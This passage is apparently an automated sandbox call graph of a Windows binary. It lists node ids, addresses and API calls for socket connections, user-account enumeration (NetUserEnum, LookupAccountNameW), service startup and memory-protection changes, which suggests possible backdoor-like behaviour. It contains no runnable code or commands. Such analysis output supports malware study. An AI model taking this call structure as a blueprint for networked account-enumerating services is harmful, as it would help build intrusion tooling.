60535 7ffe126e2984 WSAGetLastError 60532->60535 60536 7ffe126e2941 listen 60532->60536 60534->60530 60537 7ffe126e2072 10 API calls 60535->60537 60536->60528 60538 7ffe126e295a WSAGetLastError 60536->60538 60540 7ffe126e2982 60537->60540 60539 7ffe126e2072 10 API calls 60538->60539 60539->60540 60540->60528 60540->60531 60542 7ffe126e26c9 ioctlsocket 60541->60542 60544 7ffe126e26fd WSAGetLastError 60542->60544 60545 7ffe126e26ec 60542->60545 60546 7ffe126e2072 10 API calls 60544->60546 60545->60519 60546->60545 60548 7ffe126e2639 setsockopt 60547->60548 60549 7ffe126e2694 WSAGetLastError 60547->60549 60550 7ffe126e2665 60548->60550 60551 7ffe126e266f WSAGetLastError 60548->60551 60552 7ffe126e2072 10 API calls 60549->60552 60550->60519 60553 7ffe126e2072 10 API calls 60551->60553 60552->60550 60553->60550 60555 7ffe126e2d58 accept 60554->60555 60556 7ffe126e2cc4 60554->60556 60558 7ffe126e2e9a WSAGetLastError 60555->60558 60559 7ffe126e2d7e 60555->60559 60557 7ffe126e26b9 12 API calls 60556->60557 60560 7ffe126e2cce 60557->60560 60561 7ffe126e2072 10 API calls 60558->60561 60562 7ffe126e26b9 12 API calls 60559->60562 60563 7ffe126e2cee select 60560->60563 60575 7ffe126e2cd3 60560->60575 60561->60575 60564 7ffe126e2d8b 60562->60564 60565 7ffe126e2e29 60563->60565 60566 7ffe126e2d52 60563->60566 60567 7ffe126e2e86 60564->60567 60568 7ffe126e2d94 htonl htons 60564->60568 60572 7ffe126e2072 10 API calls 60565->60572 60566->60555 60570 7ffe126e2e53 WSAGetLastError 60566->60570 60583 7ffe126e2785 14 API calls 60567->60583 60571 7ffe126e2db7 60568->60571 60574 7ffe126e2072 10 API calls 60570->60574 60576 7ffe126e2072 10 API calls 60571->60576 60572->60575 60574->60575 60575->60519 60576->60575 60578 7ffe126e2827 60577->60578 60579 7ffe126e2831 WSAGetLastError 60577->60579 60578->60519 60580 7ffe126e2072 10 API calls 60579->60580 60580->60578 60581->60506 60582->60530 60583->60575 60584 7ffe11507174 60593 7ffe11506da3 60584->60593 60585 7ffe115071c3 wcslen GetProcessHeap HeapAlloc 60585->60593 60586 7ffe11507283 NetApiBufferFree 60588 7ffe11507273 60586->60588 60587 7ffe115073c3 60595 7ffe115040d2 10 API calls 60587->60595 60598 7ffe115073cc 60587->60598 60588->60586 60588->60587 60590 7ffe115072a6 NetUserEnum 60588->60590 60600 7ffe11507322 GetProcessHeap HeapAlloc 60588->60600 60589 7ffe11507234 GetProcessHeap HeapAlloc 60591 7ffe11507258 60589->60591 60589->60593 60590->60588 60591->60593 60596 7ffe115040d2 10 API calls 60591->60596 60592 7ffe1150751a 60599 7ffe115040d2 10 API calls 60592->60599 60593->60585 60593->60588 60593->60589 60594 7ffe11506dce LocalAlloc 60593->60594 60602 7ffe11506ded wcsncpy 60593->60602 60613 7ffe11506e75 GetLastError 60593->60613 60614 7ffe11507070 ConvertSidToStringSidA 60593->60614 60624 7ffe115040d2 10 API calls 60593->60624 60594->60593 60595->60598 60596->60591 60597 7ffe11506c7f 8 API calls 60601 7ffe115073d9 60597->60601 60598->60592 60615 7ffe115073d4 60598->60615 60603 7ffe115073f6 60599->60603 60604 7ffe1150735c 60600->60604 60605 7ffe11506d83 60600->60605 60606 7ffe115040d2 10 API calls 60601->60606 60627 7ffe115093ef 60602->60627 60609 7ffe11507368 memcpy GetProcessHeap HeapFree 60604->60609 60610 7ffe115073a1 60604->60610 60605->60588 60607 7ffe115040d2 10 API calls 60605->60607 60606->60603 60607->60605 60609->60610 60612 7ffe11506ebe GetLastError 60612->60593 60616 7ffe11506ee1 LocalAlloc 60612->60616 60617 7ffe115040d2 10 API calls 60613->60617 60614->60593 60618 7ffe115070c1 GetLastError 60614->60618 60615->60597 60619 7ffe11507066 60616->60619 60620 7ffe11506eff LookupAccountNameW 60616->60620 60617->60593 60623 7ffe115040d2 10 API calls 60618->60623 60619->60614 60621 7ffe11506f33 LocalFree 60620->60621 60622 7ffe11506f41 GetLastError 60620->60622 60621->60593 60625 7ffe115040d2 10 API calls 60622->60625 60623->60593 60624->60593 60626 7ffe11506f5f 60625->60626 60626->60621 60628 7ffe11509417 wcslen 60627->60628 60629 7ffe11506e17 LookupAccountNameW 60627->60629 60628->60629 60629->60593 60629->60612 60630 7ffe126e33cf 60631 7ffe126e33fa LeaveCriticalSection 60630->60631 60632 7ffe126e33d7 60630->60632 60639 7ffe126e3388 60631->60639 60632->60630 60649 7ffe126e2f7d 60632->60649 60633 7ffe126e340c GetProcessHeap HeapFree 60633->60639 60635 7ffe126e34eb Sleep SleepEx 60636 7ffe126e34fb EnterCriticalSection 60635->60636 60640 7ffe126e3508 60636->60640 60637 7ffe126e343a EnterCriticalSection 60638 7ffe126e345d LeaveCriticalSection 60637->60638 60637->60639 60638->60639 60639->60633 60639->60635 60639->60636 60639->60637 60639->60638 60643 7ffe126e33b2 60639->60643 60647 7ffe126e33a8 60639->60647 60660 7ffe126e89d5 GetSystemTimeAsFileTime 60639->60660 60641 7ffe126e3539 LeaveCriticalSection 60640->60641 60642 7ffe126e3520 GetProcessHeap HeapFree 60640->60642 60642->60640 60645 7ffe126e2072 10 API calls 60643->60645 60646 7ffe126e34ca EnterCriticalSection 60645->60646 60661 7ffe126e89d5 GetSystemTimeAsFileTime 60647->60661 60650 7ffe126e302c 60649->60650 60651 7ffe126e2fa8 60649->60651 60652 7ffe126e2072 10 API calls 60650->60652 60651->60650 60656 7ffe126e2fad 60651->60656 60654 7ffe126e3000 60652->60654 60653 7ffe126e2fb6 send 60655 7ffe126e2fda WSAGetLastError 60653->60655 60653->60656 60654->60632 60658 7ffe126e2072 10 API calls 60655->60658 60656->60653 60657 7ffe126e2ff9 60656->60657 60657->60654 60659 7ffe126e2072 10 API calls 60657->60659 60658->60657 60659->60654 60660->60639 60661->60643 60662 7ffe126e378b 60663 7ffe126e379d 60662->60663 60664 7ffe126e3919 60663->60664 60666 7ffe126e37de Sleep SleepEx 60663->60666 60667 7ffe126e3862 GetProcessHeap HeapAlloc 60663->60667 60675 7ffe126e2eca 60663->60675 60666->60663 60668 7ffe126e37fb 60667->60668 60669 7ffe126e3889 memcpy 60667->60669 60668->60663 60671 7ffe126e2072 10 API calls 60668->60671 60673 7ffe126e3837 memcpy 60668->60673 60674 7ffe126e3821 LeaveCriticalSection 60668->60674 60670 7ffe126e2072 10 API calls 60669->60670 60672 7ffe126e38e9 EnterCriticalSection 60670->60672 60671->60668 60672->60668 60673->60663 60674->60668 60676 7ffe126e2f58 60675->60676 60677 7ffe126e2ee4 60675->60677 60679 7ffe126e2072 10 API calls 60676->60679 60677->60676 60678 7ffe126e2ee9 recv 60677->60678 60680 7ffe126e2f0c WSAGetLastError 60678->60680 60681 7ffe126e2eff 60678->60681 60685 7ffe126e2f03 60679->60685 60682 7ffe126e2f20 60680->60682 60680->60685 60684 7ffe126e2072 10 API calls 60681->60684 60681->60685 60683 7ffe126e2072 10 API calls 60682->60683 60683->60685 60684->60685 60685->60663 60686 7ffe11bda31a 60691 7ffe11bda325 60686->60691 60687 7ffe11bda42e 60688 7ffe11bda43b 60687->60688 60753 7ffe11bdad75 10 API calls 60687->60753 60690 7ffe11bda34d Sleep 60690->60691 60691->60687 60691->60690 60694 7ffe11bda402 Sleep 60691->60694 60695 7ffe11bdad75 10 API calls 60691->60695 60697 7ffe11bda3ee memcpy 60691->60697 60698 7ffe11bdb00c socket 60691->60698 60733 7ffe11bdb4ba 60691->60733 60744 7ffe11bda250 60691->60744 60694->60691 60695->60691 60697->60691 60699 7ffe11bdb20b WSAGetLastError 60698->60699 60700 7ffe11bdb043 60698->60700 60701 7ffe11bdc852 6 API calls 60699->60701 60702 7ffe11bdb047 60700->60702 60703 7ffe11bdb065 60700->60703 60704 7ffe11bdb22f 60701->60704 60754 7ffe11bdaca9 60702->60754 60705 7ffe11bdaca9 8 API calls 60703->60705 60707 7ffe11bdb07f 60704->60707 60708 7ffe11bdb239 60704->60708 60709 7ffe11bdb063 60705->60709 60713 7ffe11bdc852 6 API calls 60707->60713 60711 7ffe11bdc852 6 API calls 60708->60711 60712 7ffe11bdb077 60709->60712 60767 7ffe11bdadda setsockopt 60709->60767 60716 7ffe11bdb0a0 60711->60716 60771 7ffe11bdad75 10 API calls 60712->60771 60713->60716 60714 7ffe11bdb0be 60714->60712 60719 7ffe11bdb0c3 htonl htons connect 60714->60719 60716->60691 60720 7ffe11bdb11c WSAGetLastError 60719->60720 60721 7ffe11bdb101 60719->60721 60723 7ffe11bdb12d 60720->60723 60724 7ffe11bdb1de WSAGetLastError 60720->60724 60722 7ffe11bdaca9 8 API calls 60721->60722 60725 7ffe11bdb10e 60722->60725 60723->60712 60726 7ffe11bdb135 select 60723->60726 60727 7ffe11bdc852 6 API calls 60724->60727 60725->60704 60725->60712 60728 7ffe11bdb196 60726->60728 60729 7ffe11bdb1c0 60726->60729 60727->60712 60728->60721 60730 7ffe11bdb19c WSAGetLastError 60728->60730 60731 7ffe11bdc852 6 API calls 60729->60731 60732 7ffe11bdc852 6 API calls 60730->60732 60731->60712 60732->60712 60734 7ffe11bdb548 60733->60734 60735 7ffe11bdb4d4 60733->60735 60736 7ffe11bdc852 6 API calls 60734->60736 60735->60734 60737 7ffe11bdb4d9 recv 60735->60737 60739 7ffe11bdb4f3 60736->60739 60738 7ffe11bdb4fc WSAGetLastError 60737->60738 60741 7ffe11bdb4ef 60737->60741 60738->60739 60740 7ffe11bdb510 60738->60740 60739->60691 60742 7ffe11bdc852 6 API calls 60740->60742 60741->60739 60743 7ffe11bdc852 6 API calls 60741->60743 60742->60739 60743->60739 60745 7ffe11bda268 60744->60745 60746 7ffe11bda312 60744->60746 60745->60746 60772 7ffe11bd9035 60745->60772 60746->60691 60749 7ffe11bda304 LeaveCriticalSection 60749->60746 60750 7ffe11bda298 60750->60749 60751 7ffe11bdc852 6 API calls 60750->60751 60775 7ffe11bde417 60750->60775 60751->60750 60753->60688 60755 7ffe11bdacb9 ioctlsocket 60754->60755 60757 7ffe11bdaced WSAGetLastError 60755->60757 60758 7ffe11bdacdc 60755->60758 60759 7ffe11bdc852 6 API calls 60757->60759 60758->60714 60760 7ffe11bdabf4 setsockopt 60758->60760 60759->60758 60761 7ffe11bdac29 setsockopt 60760->60761 60762 7ffe11bdac84 WSAGetLastError 60760->60762 60764 7ffe11bdac55 60761->60764 60765 7ffe11bdac5f WSAGetLastError 60761->60765 60763 7ffe11bdc852 6 API calls 60762->60763 60763->60764 60764->60709 60766 7ffe11bdc852 6 API calls 60765->60766 60766->60764 60768 7ffe11bdae17 60767->60768 60769 7ffe11bdae21 WSAGetLastError 60767->60769 60768->60714 60770 7ffe11bdc852 6 API calls 60769->60770 60770->60768 60771->60707 60773 7ffe11bd904b GetSystemTimeAsFileTime 60772->60773 60774 7ffe11bd9040 EnterCriticalSection 60772->60774 60773->60774 60774->60750 60776 7ffe11bde447 60775->60776 60794 7ffe11bde46f 60775->60794 60777 7ffe11bde4b7 60776->60777 60778 7ffe11bde451 60776->60778 60806 7ffe11bddc4a 90 API calls 60777->60806 60779 7ffe11bde48d 60778->60779 60780 7ffe11bde453 60778->60780 60784 7ffe11bde494 60779->60784 60785 7ffe11bde4be 60779->60785 60782 7ffe11bde45a 60780->60782 60783 7ffe11bde4c5 60780->60783 60786 7ffe11bde45c 60782->60786 60787 7ffe11bde478 60782->60787 60808 7ffe11bdddf1 24 API calls 60783->60808 60790 7ffe11bde49b 60784->60790 60791 7ffe11bde4b0 60784->60791 60807 7ffe11bddcbf 47 API calls 60785->60807 60792 7ffe11bde4cc 60786->60792 60797 7ffe11bde463 60786->60797 60787->60794 60804 7ffe11bddf13 15 API calls 60787->60804 60790->60794 60805 7ffe11bddb66 183 API calls 60790->60805 60800 7ffe11bddb58 60791->60800 60809 7ffe11bdde9a 18 API calls 60792->60809 60794->60750 60797->60794 60803 7ffe11bddf93 34 API calls 60797->60803 60810 7ffe11bddb10 60800->60810 60803->60794 60804->60794 60805->60794 60806->60794 60807->60794 60808->60794 60809->60794 60817 7ffe11bdbceb 60810->60817 60815 7ffe11bdbceb 2 API calls 60816 7ffe11bddb31 60815->60816 60816->60794 60818 7ffe11bdbd01 QueryPerformanceFrequency QueryPerformanceCounter 60817->60818 60819 7ffe11bdbcf6 60817->60819 60818->60819 60819->60816 60820 7ffe11bd6f2b 60819->60820 60855 7ffe11bd6eed 60820->60855 60823 7ffe11bd6f41 60825 7ffe11bd6f4e 60823->60825 60864 7ffe11bd8b2c 22 API calls 60823->60864 60824 7ffe11bdb930 8 API calls 60826 7ffe11bd6f69 60824->60826 60825->60815 60828 7ffe11bd466b 8 API calls 60826->60828 60829 7ffe11bd6f7e 60828->60829 60830 7ffe11bd6f88 strlen 60829->60830 60831 7ffe11bd702f 60829->60831 60834 7ffe11bd6fa5 60830->60834 60835 7ffe11bd6fbe strlen 60830->60835 60831->60823 60832 7ffe11bd7037 strlen 60831->60832 60836 7ffe11bd7064 strlen 60832->60836 60837 7ffe11bd704e 60832->60837 60834->60835 60840 7ffe11bd6faa strlen 60834->60840 60860 7ffe11bd3714 10 API calls 60835->60860 60862 7ffe11bd3714 10 API calls 60836->60862 60837->60836 60843 7ffe11bd7053 strlen 60837->60843 60839 7ffe11bd710a 60849 7ffe11bd7131 60839->60849 60865 7ffe11bd8b47 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 60839->60865 60866 7ffe11bd81b3 7 API calls 60839->60866 60840->60835 60842 7ffe11bd7004 60842->60823 60861 7ffe11bd4246 8 API calls 60842->60861 60843->60836 60845 7ffe11bd70a7 60848 7ffe11bd70b4 CompareFileTime 60845->60848 60851 7ffe11bd70ea 60845->60851 60848->60823 60852 7ffe11bd70cc 60848->60852 60849->60839 60867 7ffe11bd8237 41 API calls 60849->60867 60868 7ffe11bd7e40 19 API calls 60849->60868 60850 7ffe11bd702d 60850->60831 60851->60823 60863 7ffe11bd2c59 8 API calls 60852->60863 60869 7ffe11bd5dd0 60855->60869 60858 7ffe11bd6efa 60858->60823 60858->60824 60860->60842 60861->60850 60862->60845 60863->60851 60864->60839 60865->60839 60866->60839 60867->60849 60868->60849 60870 7ffe11bd5192 9 API calls 60869->60870 60871 7ffe11bd5e13 60870->60871 60872 7ffe11bd5e17 strlen 60871->60872 60873 7ffe11bd5e60 60871->60873 60874 7ffe11bd5e2d strcmp 60872->60874 60873->60858 60882 7ffe11bdb25e 27 API calls 60873->60882 60874->60873 60876 7ffe11bd5e6e 60874->60876 60883 7ffe11bd4246 8 API calls 60876->60883 60878 7ffe11bd5e94 60878->60873 60879 7ffe11bd5ea6 60878->60879 60884 7ffe11bd3f67 8 API calls 60879->60884 60881 7ffe11bd5eb0 60881->60873 60882->60858 60883->60878 60884->60881 60885 7ffe1a52c415 60893 7ffe1a52c422 60885->60893 60886 7ffe1a52c632 60887 7ffe1a52c443 Sleep 60887->60893 60889 7ffe1a52c4bf Sleep 60889->60893 60890 7ffe1a5277a2 6 API calls 60890->60893 60891 7ffe1a52c592 memcpy 60891->60893 60893->60886 60893->60887 60893->60889 60893->60890 60893->60891 60894 7ffe1a52c3ac 8 API calls 60893->60894 60895 7ffe1a5261a2 13 API calls 60893->60895 60894->60893 60895->60893 60896 7ff7c1ab12fd 60899 7ff7c1ab1131 60896->60899 60900 7ff7c1ab115a 60899->60900 60901 7ff7c1ab1172 60900->60901 60902 7ff7c1ab1169 Sleep 60900->60902 60903 7ff7c1ab1194 60901->60903 60904 7ff7c1ab1188 _amsg_exit 60901->60904 60902->60900 60905 7ff7c1ab11b5 60903->60905 60906 7ff7c1ab119a _initterm 60903->60906 60904->60905 60907 7ff7c1ab11c5 _initterm 60905->60907 60908 7ff7c1ab11de 60905->60908 60906->60905 60907->60908 60920 7ff7c1aba1bb 60908->60920 60911 7ff7c1ab122e 60912 7ff7c1ab1233 malloc 60911->60912 60913 7ff7c1ab1253 60912->60913 60914 7ff7c1ab1283 60913->60914 60915 7ff7c1ab1258 strlen malloc 60913->60915 60931 7ff7c1ab1fa9 60914->60931 60915->60913 60917 7ff7c1ab12c4 60918 7ff7c1ab12e3 _cexit 60917->60918 60919 7ff7c1ab12e8 60917->60919 60918->60919 60921 7ff7c1ab1208 SetUnhandledExceptionFilter 60920->60921 60923 7ff7c1aba1d9 60920->60923 60921->60911 60922 7ff7c1aba3df 60922->60921 60925 7ff7c1aba407 VirtualProtect 60922->60925 60923->60922 60924 7ff7c1aba250 60923->60924 60929 7ff7c1aba28f 60923->60929 60924->60922 60926 7ff7c1aba26e 60924->60926 60925->60922 60926->60924 60935 7ff7c1aba074 VirtualQuery VirtualProtect GetLastError 60926->60935 60928 7ff7c1aba2fa 60936 7ff7c1aba074 VirtualQuery VirtualProtect GetLastError 60928->60936 60929->60922 60929->60928 60932 7ff7c1ab1fb9 60931->60932 60937 7ff7c1ab1dbc 60932->60937 60935->60926 60936->60929 60938 7ff7c1ab1dc6 strcmp 60937->60938 60940 7ff7c1ab1e40 60938->60940 60941 7ff7c1ab1ddd strcmp 60938->60941 60944 7ff7c1ab161a 116 API calls 60940->60944 60942 7ff7c1ab1f81 60941->60942 60943 7ff7c1ab1df4 StartServiceCtrlDispatcherA 60941->60943 60945 7ff7c1ab2ef2 6 API calls 60942->60945 60946 7ff7c1ab1e98 GetLastError 60943->60946 60954 7ff7c1ab1e2d 60943->60954 60947 7ff7c1ab1e45 60944->60947 60945->60954 60948 7ff7c1ab2ef2 6 API calls 60946->60948 60949 7ff7c1ab1e4b 60947->60949 60950 7ff7c1ab16e3 385 API calls 60947->60950 60948->60954 60958 7ff7c1ab1a63 10 API calls 60949->60958 60956 7ff7c1ab1e5f 60950->60956 60952 7ff7c1ab1e50 60959 7ff7c1ab1b1c 13 API calls 60952->60959 60954->60917 60955 7ff7c1ab1e69 _read 60955->60949 60955->60956 60956->60949 60956->60955 60957 7ff7c1ab19e2 25 API calls 60956->60957 60957->60956 60958->60952 60959->60954 60960 7ffe1a52605a 60965 7ffe1a526065 60960->60965 60961 7ffe1a52616e 60962 7ffe1a52617b 60961->60962 61027 7ffe1a5214c5 60961->61027 60965->60961 60966 7ffe1a52608d Sleep 60965->60966 60968 7ffe1a526142 Sleep 60965->60968 60969 7ffe1a5214c5 10 API calls 60965->60969 60971 7ffe1a52612e memcpy 60965->60971 60972 7ffe1a52175c socket 60965->60972 61007 7ffe1a521c0a 60965->61007 61018 7ffe1a525f90 60965->61018 60966->60965 60968->60965 60969->60965 60971->60965 60973 7ffe1a521793 60972->60973 60974 7ffe1a52195b WSAGetLastError 60972->60974 60975 7ffe1a5217b5 60973->60975 60976 7ffe1a521797 60973->60976 60977 7ffe1a5277a2 6 API calls 60974->60977 60980 7ffe1a5213f9 8 API calls 60975->60980 61036 7ffe1a5213f9 60976->61036 60979 7ffe1a52197f 60977->60979 60982 7ffe1a521989 60979->60982 60994 7ffe1a5217cf 60979->60994 60983 7ffe1a5217b3 60980->60983 60986 7ffe1a5277a2 6 API calls 60982->60986 61001 7ffe1a5217c7 60983->61001 61049 7ffe1a52152a setsockopt 60983->61049 60984 7ffe1a5277a2 6 API calls 60987 7ffe1a5217f0 60984->60987 60985 7ffe1a52180e 60989 7ffe1a521813 htonl htons connect 60985->60989 60985->61001 60986->60987 60987->60965 60992 7ffe1a521851 60989->60992 60993 7ffe1a52186c WSAGetLastError 60989->60993 60991 7ffe1a5214c5 10 API calls 60991->60994 60995 7ffe1a5213f9 8 API calls 60992->60995 60996 7ffe1a52192e WSAGetLastError 60993->60996 60997 7ffe1a52187d 60993->60997 60994->60984 60999 7ffe1a52185e 60995->60999 60998 7ffe1a5277a2 6 API calls 60996->60998 61000 7ffe1a521885 select 60997->61000 60997->61001 60998->61001 60999->60979 60999->61001 61002 7ffe1a521910 61000->61002 61003 7ffe1a5218e6 61000->61003 61001->60991 61004 7ffe1a5277a2 6 API calls 61002->61004 61003->60992 61005 7ffe1a5218ec WSAGetLastError 61003->61005 61004->61001 61006 7ffe1a5277a2 6 API calls 61005->61006 61006->61001 61008 7ffe1a521c24 61007->61008 61009 7ffe1a521c98 61007->61009 61008->61009 61010 7ffe1a521c29 recv 61008->61010 61011 7ffe1a5277a2 6 API calls 61009->61011 61012 7ffe1a521c4c WSAGetLastError 61010->61012 61014 7ffe1a521c3f 61010->61014 61013 7ffe1a521c43 61011->61013 61012->61013 61015 7ffe1a521c60 61012->61015 61013->60965 61014->61013 61017 7ffe1a5277a2 6 API calls 61014->61017 61016 7ffe1a5277a2 6 API calls 61015->61016 61016->61013 61017->61013 61019 7ffe1a526052 61018->61019 61020 7ffe1a525fa8 61018->61020 61019->60965 61020->61019 61053 7ffe1a5222f5 61020->61053 61023 7ffe1a526044 LeaveCriticalSection 61023->61019 61024 7ffe1a525fd8 61024->61023 61025 7ffe1a5277a2 6 API calls 61024->61025 61056 7ffe1a52bc77 61024->61056 61025->61024 61028 7ffe1a5214d9 61027->61028 61035 7ffe1a5214d3 61027->61035 61307 7ffe1a521462 shutdown 61028->61307 61031 7ffe1a5214f1 61033 7ffe1a5277a2 6 API calls 61031->61033 61032 7ffe1a521509 WSAGetLastError 61034 7ffe1a5277a2 6 API calls 61032->61034 61033->61035 61034->61035 61035->60962 61037 7ffe1a521409 ioctlsocket 61036->61037 61039 7ffe1a52143d WSAGetLastError 61037->61039 61040 7ffe1a52142c 61037->61040 61041 7ffe1a5277a2 6 API calls 61039->61041 61040->60985 61042 7ffe1a521344 setsockopt 61040->61042 61041->61040 61043 7ffe1a5213d4 WSAGetLastError 61042->61043 61044 7ffe1a521379 setsockopt 61042->61044 61047 7ffe1a5277a2 6 API calls 61043->61047 61045 7ffe1a5213af WSAGetLastError 61044->61045 61046 7ffe1a5213a5 61044->61046 61048 7ffe1a5277a2 6 API calls 61045->61048 61046->60983 61047->61046 61048->61046 61050 7ffe1a521571 WSAGetLastError 61049->61050 61051 7ffe1a521567 61049->61051 61052 7ffe1a5277a2 6 API calls 61050->61052 61051->60985 61052->61051 61054 7ffe1a522300 EnterCriticalSection 61053->61054 61055 7ffe1a52230b GetSystemTimeAsFileTime 61053->61055 61054->61024 61055->61054 61057 7ffe1a52bd05 61056->61057 61058 7ffe1a52bc99 61056->61058 61059 7ffe1a52bd20 61057->61059 61060 7ffe1a52bd0f 61057->61060 61063 7ffe1a52bcb0 61058->61063 61121 7ffe1a52689b 61058->61121 61061 7ffe1a52689b 2 API calls 61059->61061 61065 7ffe1a5222f5 GetSystemTimeAsFileTime 61060->61065 61113 7ffe1a52bcfb 61060->61113 61061->61113 61072 7ffe1a52c26f GetProcessHeap HeapAlloc 61063->61072 61073 7ffe1a52c262 61063->61073 61063->61113 61067 7ffe1a52be02 61065->61067 61066 7ffe1a52c0d3 61069 7ffe1a52c167 61066->61069 61078 7ffe1a52c118 61066->61078 61068 7ffe1a527400 8 API calls 61067->61068 61070 7ffe1a52be9c 61068->61070 61071 7ffe1a52689b 2 API calls 61069->61071 61151 7ffe1a525ec9 12 API calls 61070->61151 61075 7ffe1a52c171 61071->61075 61076 7ffe1a52c309 61072->61076 61077 7ffe1a52c297 memcpy 61072->61077 61073->61072 61124 7ffe1a52b910 61075->61124 61079 7ffe1a5277a2 6 API calls 61076->61079 61096 7ffe1a52c2d7 61077->61096 61084 7ffe1a52c142 61078->61084 61085 7ffe1a52c187 61078->61085 61120 7ffe1a52c02f 61079->61120 61080 7ffe1a52beb8 61082 7ffe1a52bec0 61080->61082 61083 7ffe1a52c039 61080->61083 61088 7ffe1a52d3f2 9 API calls 61082->61088 61157 7ffe1a523805 30 API calls 61083->61157 61086 7ffe1a52c196 61084->61086 61087 7ffe1a52c14c 61084->61087 61130 7ffe1a52b9f4 61085->61130 61094 7ffe1a52689b 2 API calls 61086->61094 61092 7ffe1a52689b 2 API calls 61087->61092 61093 7ffe1a52beec 61088->61093 61090 7ffe1a52c2df 61099 7ffe1a52c2ed GetProcessHeap HeapFree 61090->61099 61090->61113 61092->61113 61097 7ffe1a52befe 61093->61097 61100 7ffe1a52c08c memcpy 61093->61100 61098 7ffe1a52c1a0 61094->61098 61095 7ffe1a52c06c 61095->61082 61096->61090 61159 7ffe1a52bc0e 8 API calls 61096->61159 61152 7ffe1a5268e2 8 API calls 61097->61152 61102 7ffe1a5222f5 GetSystemTimeAsFileTime 61098->61102 61098->61113 61099->61113 61100->61097 61103 7ffe1a52c1fd 61102->61103 61105 7ffe1a52689b 2 API calls 61103->61105 61104 7ffe1a52bf08 61153 7ffe1a526a68 10 API calls 61104->61153 61108 7ffe1a52c20f 61105->61108 61158 7ffe1a5261a2 13 API calls 61108->61158 61109 7ffe1a52bf3d 61154 7ffe1a529370 58 API calls 61109->61154 61113->61024 61114 7ffe1a52bfa9 61115 7ffe1a52bfd0 61114->61115 61155 7ffe1a521290 7 API calls 61114->61155 61116 7ffe1a52c000 61115->61116 61117 7ffe1a52bfe9 GetProcessHeap HeapFree 61115->61117 61156 7ffe1a5261a2 13 API calls 61116->61156 61117->61116 61120->61113 61122 7ffe1a5268b1 QueryPerformanceFrequency QueryPerformanceCounter 61121->61122 61123 7ffe1a5268a6 61121->61123 61122->61123 61123->61063 61123->61066 61125 7ffe1a52b93d 61124->61125 61127 7ffe1a52b920 61124->61127 61126 7ffe1a52b954 61125->61126 61128 7ffe1a5214c5 10 API calls 61125->61128 61126->61113 61127->61125 61160 7ffe1a52b482 61127->61160 61128->61126 61131 7ffe1a52ba08 61130->61131 61133 7ffe1a52bb8c 61130->61133 61131->61133 61134 7ffe1a52ba2d 61131->61134 61132 7ffe1a52ba66 61132->61113 61133->61132 61135 7ffe1a52175c 27 API calls 61133->61135 61136 7ffe1a52ba89 61134->61136 61137 7ffe1a52ba37 61134->61137 61138 7ffe1a52bbc3 61135->61138 61205 7ffe1a52b501 61136->61205 61139 7ffe1a52bb10 61137->61139 61140 7ffe1a52ba44 61137->61140 61138->61132 61145 7ffe1a52689b 2 API calls 61138->61145 61244 7ffe1a52b30e 48 API calls 61139->61244 61140->61132 61243 7ffe1a52b800 68 API calls 61140->61243 61144 7ffe1a52bb1c 61144->61132 61149 7ffe1a52689b 2 API calls 61144->61149 61145->61132 61147 7ffe1a52689b 2 API calls 61147->61132 61148 7ffe1a52ba5e 61148->61132 61150 7ffe1a52689b 2 API calls 61148->61150 61149->61132 61150->61132 61151->61080 61152->61104 61153->61109 61154->61114 61155->61115 61156->61120 61157->61095 61158->61113 61159->61090 61161 7ffe1a52b490 61160->61161 61167 7ffe1a52b49e 61160->61167 61168 7ffe1a52b456 61161->61168 61166 7ffe1a5214c5 10 API calls 61166->61167 61167->61125 61169 7ffe1a52b46d 61168->61169 61170 7ffe1a52b463 61168->61170 61169->61167 61172 7ffe1a52afb0 61169->61172 61170->61169 61171 7ffe1a5214c5 10 API calls 61170->61171 61171->61169 61179 7ffe1a52afdf 61172->61179 61173 7ffe1a52eaa0 fputc 61173->61179 61174 7ffe1a52b044 61177 7ffe1a5277a2 6 API calls 61174->61177 61175 7ffe1a52b0a1 GetProcessHeap HeapAlloc 61178 7ffe1a52b0c5 61175->61178 61175->61179 61176 7ffe1a52aff3 GetProcessHeap HeapReAlloc 61176->61179 61180 7ffe1a52b0dd 61176->61180 61181 7ffe1a52b05a strlen 61177->61181 61182 7ffe1a5277a2 6 API calls 61178->61182 61179->61173 61179->61174 61179->61175 61179->61176 61183 7ffe1a5277a2 6 API calls 61180->61183 61191 7ffe1a52af98 61181->61191 61185 7ffe1a52b0db 61182->61185 61186 7ffe1a52b0f3 61183->61186 61188 7ffe1a52b10f 61185->61188 61186->61188 61189 7ffe1a52b0f8 GetProcessHeap HeapFree 61186->61189 61188->61166 61189->61188 61190 7ffe1a52b080 GetProcessHeap HeapFree 61190->61188 61194 7ffe1a521cbd 61191->61194 61195 7ffe1a521ce8 61194->61195 61196 7ffe1a521d6c 61194->61196 61195->61196 61198 7ffe1a521ced 61195->61198 61197 7ffe1a5277a2 6 API calls 61196->61197 61201 7ffe1a521d40 61197->61201 61199 7ffe1a521cf6 send 61198->61199 61203 7ffe1a521d39 61198->61203 61199->61198 61200 7ffe1a521d1a WSAGetLastError 61199->61200 61202 7ffe1a5277a2 6 API calls 61200->61202 61201->61188 61201->61190 61202->61203 61203->61201 61204 7ffe1a5277a2 6 API calls 61203->61204 61204->61201 61206 7ffe1a52b7c0 61205->61206 61207 7ffe1a52b536 61205->61207 61206->61132 61206->61147 61208 7ffe1a52b5a5 61207->61208 61209 7ffe1a52b591 strlen 61207->61209 61245 7ffe1a52275a 61208->61245 61209->61208 61224 7ffe1a52b673 61209->61224 61213 7ffe1a52b482 21 API calls 61213->61206 61215 7ffe1a52afb0 17 API calls 61216 7ffe1a52b614 61215->61216 61216->61224 61254 7ffe1a52b217 61216->61254 61224->61206 61224->61213 61243->61148 61244->61144 61246 7ffe1a5227b2 61245->61246 61248 7ffe1a522776 61245->61248 61249 7ffe1a52b2da 61246->61249 61248->61246 61267 7ffe1a52273a rand_s 61248->61267 61268 7ffe1a52af6a 61249->61268 61252 7ffe1a52b2ff 61252->61215 61252->61224 61294 7ffe1a52b132 61254->61294 61257 7ffe1a52b23c 61257->61224 61260 7ffe1a52aa20 strcmp strcmp strcmp strcmp 61257->61260 61258 7ffe1a52b232 61303 7ffe1a52ad36 25 API calls 61258->61303 61267->61248 61269 7ffe1a52175c 27 API calls 61268->61269 61270 7ffe1a52af77 61269->61270 61271 7ffe1a52af80 61270->61271 61287 7ffe1a521596 setsockopt 61270->61287 61271->61252 61273 7ffe1a52b24b 61271->61273 61274 7ffe1a52afb0 17 API calls 61273->61274 61275 7ffe1a52b260 61274->61275 61276 7ffe1a52b2a9 61275->61276 61277 